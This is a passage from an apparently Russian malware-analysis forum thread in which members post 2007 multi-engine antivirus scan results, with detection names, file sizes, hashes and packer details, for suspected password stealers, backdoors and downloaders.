Avast	4.7.1043.0	2007.09.29	Win32:LdPinch-NO
AVG	7.5.0.488	2007.09.30	-
BitDefender	7.2	2007.09.30	MemScan:Trojan.PWS.LdPinch.BSJ
CAT-QuickHeal	9.00	2007.09.29	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.30	-
DrWeb	4.33	2007.09.29	-
eSafe	7.0.15.0	2007.09.29	Suspicious Trojan/Worm
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.29	-
FileAdvisor	1	2007.09.30	-
Fortinet	3.11.0.0	2007.09.30	-
F-Prot	4.3.2.48	2007.09.29	-
F-Secure	6.70.13030.0	2007.09.29	-
Ikarus	T3.1.1.12	2007.09.30	Backdoor.Win32.Hupigon.aco
Kaspersky	7.0.0.125	2007.09.30	Heur.Trojan.Generic
McAfee	5130	2007.09.28	-
Microsoft	1.2803	2007.09.30	-
NOD32v2	2560	2007.09.30	a variant of Win32/PSW.LdPinch.NCB
Norman	5.80.02	2007.09.28	-
Panda	9.0.0.4	2007.09.29	Suspicious file
Prevx1	V2	2007.09.30	-
Rising	19.42.61.00	2007.09.30	-
Sophos	4.22.0	2007.09.30	Mal/Basine-C
Sunbelt	2.2.907.0	2007.09.28	VIPRE.Suspicious
Symantec	10	2007.09.30	-
TheHacker	6.2.6.073	2007.09.28	-
VBA32	3.12.2.4	2007.09.29	-
VirusBuster	4.3.26:9	2007.09.29	-
Webwasher-Gateway	6.0.1	2007.09.28	Heuristic.Crypted
Additional information
File size: 157696 bytes
MD5: 830971e08f67c563abf31ed2b6b73047
SHA1: 7ae6450c3fe81e9a59af7e3dd882ccac606861e3
packers: ASProtect
packers: PE_Patch, Aspack
packers: PE_Patch
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```





Antivirus 	Version 	Last Update 	Result


```
AhnLab-V3	2007.9.29.0	2007.09.28	-
AntiVir	7.6.0.18	2007.09.28	HEUR/Crypted
Authentium	4.93.8	2007.09.29	Possibly a new variant of W32/Backdoor-based
Avast	4.7.1043.0	2007.09.29	-
AVG	7.5.0.488	2007.09.30	-
BitDefender	7.2	2007.09.30	MemScan:Trojan.PWS.LdPinch.BSJ
CAT-QuickHeal	9.00	2007.09.29	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.30	-
DrWeb	4.33	2007.09.29	-
eSafe	7.0.15.0	2007.09.29	Suspicious Trojan/Worm
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.29	-
FileAdvisor	1	2007.09.30	-
Fortinet	3.11.0.0	2007.09.30	-
F-Prot	4.3.2.48	2007.09.29	-
F-Secure	6.70.13030.0	2007.09.29	-
Ikarus	T3.1.1.12	2007.09.30	Backdoor.Win32.Hupigon.aco
Kaspersky	7.0.0.125	2007.09.30	-
McAfee	5130	2007.09.28	-
Microsoft	1.2803	2007.09.30	-
NOD32v2	2560	2007.09.30	a variant of Win32/PSW.LdPinch.NCB
Norman	5.80.02	2007.09.28	-
Panda	9.0.0.4	2007.09.29	Suspicious file
Prevx1	V2	2007.09.30	-
Rising	19.42.61.00	2007.09.30	-
Sophos	4.22.0	2007.09.30	Mal/Basine-C
Sunbelt	2.2.907.0	2007.09.28	VIPRE.Suspicious
Symantec	10	2007.09.30	-
TheHacker	6.2.6.073	2007.09.28	-
VBA32	3.12.2.4	2007.09.29	-
VirusBuster	4.3.26:9	2007.09.29	-
Webwasher-Gateway	6.0.1	2007.09.28	Heuristic.Crypted
Additional information
File size: 161280 bytes
MD5: 6d4cc6d0c9a54a042f889719e6be530d
SHA1: 9926b8be0d176fffdfa892c35d79fc45d0905331
packers: PE_Patch, Aspack
packers: PE_Patch
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```

----------


## drongo

*T=12819*



```
Файл avz00002.dta получен 2007.10.02 10:18:06 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.10.2.1	2007.10.02	-
AntiVir	7.6.0.18	2007.10.02	TR/Crypt.XDR.Gen
Authentium	4.93.8	2007.10.02	-
Avast	4.7.1043.0	2007.10.02	-
AVG	7.5.0.488	2007.10.01	Agent.IIQ
BitDefender	7.2	2007.10.02	-
CAT-QuickHeal	9.00	2007.10.02	Backdoor.IRCBot.aiv
ClamAV	0.91.2	2007.10.02	-
DrWeb	4.44.0.09170	2007.10.02	-
eSafe	7.0.15.0	2007.10.01	-
eTrust-Vet	31.2.5178	2007.10.01	-
Ewido	4.0	2007.10.01	-
FileAdvisor	1	2007.10.02	-
Fortinet	3.11.0.0	2007.10.02	W32/IRCBot.AIV!tr.bdr
F-Prot	4.3.2.48	2007.10.01	-
F-Secure	6.70.13030.0	2007.10.02	Backdoor.Win32.IRCBot.aiv
Ikarus	T3.1.1.12	2007.10.02	-
Kaspersky	7.0.0.125	2007.10.02	Backdoor.Win32.IRCBot.aiv
McAfee	5131	2007.10.01	-
Microsoft	1.2803	2007.10.02	-
NOD32v2	2564	2007.10.02	probably a variant of Win32/Agent.NHJ
Norman	5.80.02	2007.10.01	-
Panda	9.0.0.4	2007.10.01	Suspicious file
Prevx1	V2	2007.10.02	Heuristic: Suspicious Hijacker
Rising	19.43.10.00	2007.10.02	-
Sophos	4.22.0	2007.10.02	-
Sunbelt	2.2.907.0	2007.10.02	-
Symantec	10	2007.10.02	W32.Kassbot
TheHacker	6.2.6.075	2007.10.01	-
VBA32	3.12.2.4	2007.10.02	Backdoor.Win32.IRCBot.aiv
VirusBuster	4.3.26:9	2007.10.01	-
Webwasher-Gateway	6.0.1	2007.10.02	Trojan.Crypt.XDR.Gen
Дополнительная информация
File size: 259072 bytes
MD5: 6bd23250246a394f61adfe3c5cdf4088
SHA1: fcfd8c0e055d9753100696a93495d295d2ed2700
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=22CB97F900D49072F4BE0398C6870800E6B63981
```

----------


## mayas

File my_proga.exe received on 10.03.2007 21:47:53 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 6/32 (18.75%)




```
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.10.3.0	2007.10.02	-
AntiVir	7.6.0.18	2007.10.03	DR/Delphi.Gen
Authentium	4.93.8	2007.10.03	-
Avast	4.7.1051.0	2007.10.03	-
AVG	7.5.0.488	2007.10.03	Obfustat.RNQ
BitDefender	7.2	2007.10.03	-
CAT-QuickHeal	9.00	2007.10.03	-
ClamAV	0.91.2	2007.10.03	-
DrWeb	4.44.0.09170	2007.10.03	-
eSafe	7.0.15.0	2007.10.02	-
eTrust-Vet	31.2.5183	2007.10.03	-
Ewido	4.0	2007.10.03	-
FileAdvisor	1	2007.10.03	-
Fortinet	3.11.0.0	2007.10.03	-
F-Prot	4.3.2.48	2007.10.03	-
F-Secure	6.70.13030.0	2007.10.03	-
Ikarus	T3.1.1.12	2007.10.03	Virus.Win32.Zapchast.DA
Kaspersky	7.0.0.125	2007.10.03	-
McAfee	5133	2007.10.03	-
Microsoft	1.2908	2007.10.03	-
NOD32v2	2569	2007.10.03	-
Norman	5.80.02	2007.10.03	-
Panda	9.0.0.4	2007.10.03	-
Prevx1	V2	2007.10.03	-
Rising	19.43.20.00	2007.10.03	-
Sophos	4.22.0	2007.10.03	Mal/Dropper-T
Sunbelt	2.2.907.0	2007.10.02	-
Symantec	10	2007.10.03	-
TheHacker	6.2.6.076	2007.10.03	-
VBA32	3.12.2.4	2007.10.03	-
VirusBuster	4.3.26:9	2007.10.03	Trojan.Agent.JVF
Webwasher-Gateway	6.0.1	2007.10.03	Trojan.Delphi.Gen
Additional information
File size: 46080 bytes
MD5: 17ff44f341c1040e3c68ae1801d11d56
SHA1: cc9e9e3a33a0533f2b17facde6f10cc4abd0952d
```

----------


## V_Bond

ntos.exe from the thread http://virusinfo.info/showthread.php...816#post139816
AhnLab-V3	2007.10.5.0	2007.10.04	-
AntiVir	7.6.0.20	2007.10.04	*TR/Hijacker.A*
Authentium	4.93.8	2007.10.03	-
Avast	4.7.1051.0	2007.10.04	-
AVG	7.5.0.488	2007.10.04	*PSW.Ldpinch.PZE*
BitDefender	7.2	2007.10.04	*BehavesLike:Win32.ProcessHijack*
CAT-QuickHeal	9.00	2007.10.03	-
ClamAV	0.91.2	2007.10.04	-
DrWeb	4.44.0.09170	2007.10.04	*Trojan.Inject.433*
eSafe	7.0.15.0	2007.10.02	-
eTrust-Vet	31.2.5185	2007.10.04	-
Ewido	4.0	2007.10.04	-
FileAdvisor	1	2007.10.04	-
Fortinet	3.11.0.0	2007.10.04	-
F-Prot	4.3.2.48	2007.10.03	-
F-Secure	6.70.13030.0	2007.10.04	-
Ikarus	T3.1.1.12	2007.10.04	*Trojan.Delf.NEB*
Kaspersky	7.0.0.125	2007.10.04	*Trojan.Win32.Delf.ahr*
McAfee	5134	2007.10.04	-
Microsoft	1.2908	2007.10.04	-
NOD32v2	2572	2007.10.04	-
Norman	5.80.02	2007.10.04	-
Panda	9.0.0.4	2007.10.04	*Trj/Wsnpoem.IJ*
Prevx1	V2	2007.10.04	-
Rising	19.43.30.00	2007.10.04	-
Sophos	4.22.0	2007.10.04	-
Sunbelt	2.2.907.0	2007.10.04	-
Symantec	10	2007.10.04	*Infostealer.Banker.C*
TheHacker	6.2.6.076	2007.10.03	-
VBA32	3.12.2.4	2007.10.03	-
VirusBuster	4.3.26:9	2007.10.04	-
Webwasher-Gateway	6.0.1	2007.10.04	*Trojan.Hijacker.A*
Additional information
File size: 522240 bytes
MD5: dc303cfc03b5aefe0a1438d80833e73e
SHA1: e886e10d4feb849a5ed1194ec9f72649f57a5134

----------


## TANUKI

File msntaduo.-exe received on 2007.10.05 03:03:26 (CET)

Result: 22/32 (68.75%)


Antivirus 	Version 	Update 	Result
AhnLab-V3	2007.10.5.0	2007.10.04	-
*AntiVir	7.6.0.20	2007.10.04	TR/PSW.LdPinch.TAW.203*
Authentium	4.93.8	2007.10.04	-
Avast	4.7.1051.0	2007.10.04	-
*AVG	7.5.0.488	2007.10.04	Downloader.Generic5.PGH*
*BitDefender	7.2	2007.10.05	Trojan.PWS.LDPinch.TAW
CAT-QuickHeal	9.00	2007.10.03	TrojanDownloader.Small.ert*
ClamAV	0.91.2	2007.10.04	-
*DrWeb	4.44.0.09170	2007.10.04	Trojan.Packed.166*
eSafe	7.0.15.0	2007.10.04	-
eTrust-Vet	31.2.5187	2007.10.04	-
Ewido	4.0	2007.10.04	-
*FileAdvisor	1	2007.10.05	High threat detected
Fortinet	3.11.0.0	2007.10.04	W32/AvPak.ERT!tr.dldr*
F-Prot	4.3.2.48	2007.10.04	-
*F-Secure	6.70.13030.0	2007.10.05	Trojan-Downloader.Win32.Small.ert*
*Ikarus	T3.1.1.12	2007.10.05	Trojan-Downloader.Win32.Small.cyn
Kaspersky	7.0.0.125	2007.10.05	Trojan-Downloader.Win32.Small.ert
McAfee	5134	2007.10.04	Downloader-BED
Microsoft	1.2803	2007.10.04	VirTool:Win32/Obfuscator.P
NOD32v2	2572	2007.10.04	probably a variant of Win32/Obfuscated
Norman	5.80.02	2007.10.04	W32/DLoader.DBPR
Panda	9.0.0.4	2007.10.05	Trj/Downloader.MDW*
Prevx1	V2	2007.10.05	-
*Rising	19.43.30.00	2007.10.04	Packer.RyCrypt
Sophos	4.22.0	2007.10.05	Mal/Generic-A
Sunbelt	2.2.907.0	2007.10.04	Trojan-Downloader.Win32.Small.ert
Symantec	10	2007.10.05	Downloader*
TheHacker	6.2.6.076	2007.10.03	-
*VBA32	3.12.2.4	2007.10.03	Trojan-Downloader.Win32.Small.ert
VirusBuster	4.3.26:9	2007.10.04	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.10.04	Trojan.PSW.LdPinch.TAW.203*
Additional information
File size: 5837 bytes
MD5: 23a745097e5e6c922e6cb997c97b3915
SHA1: 5138598fd94125e0f086938285edccb2c3b7da5d

----------


## Shu_b

We are wrapping up the fifth series and moving on to the sixth.

----------

